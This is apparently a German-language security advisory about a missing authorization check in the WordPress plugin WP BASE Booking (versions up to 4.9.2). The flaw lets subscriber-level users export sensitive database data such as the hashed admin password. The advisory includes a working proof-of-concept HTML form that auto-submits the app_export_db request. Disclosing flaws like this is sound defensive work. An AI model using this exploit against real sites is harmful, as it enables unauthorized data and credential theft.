
WP BASE Booking of Appointments, Services and Events <= 4.9.2 - Fehlende Autorisierung für authentifizierte Benutzer (Subscriber+): Offenlegung sensibler Informationen über app_export_db
WP BASE Booking of Appointments, Services and Events <= 4.9.2 - Fehlende Autorisierung gegenüber authentifizierten (Subscriber+) Nutzern führt zur Offenlegung sensibler Daten über app_export_db
Das Plugin WP BASE Booking of Appointments, Services and Events für WordPress ist in allen Versionen bis einschließlich 4.9.2 anfällig für unbefugten Datenzugriff, da der export_db-Funktion eine Berechtigungsprüfung fehlt. Dadurch ist es authentifizierten Angreifern mit Subscriber-Zugriff und höher möglich, sensible Informationen aus der Datenbank offenzulegen, wie zum Beispiel das gehashte Administrator-Passwort.
<html>
<body>
<form action="https://wp-dev.ddev.site/wp-admin/admin-ajax.php?action=app_export_db" method="POST">
<input type="hidden" name="action" value="app_export_db" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>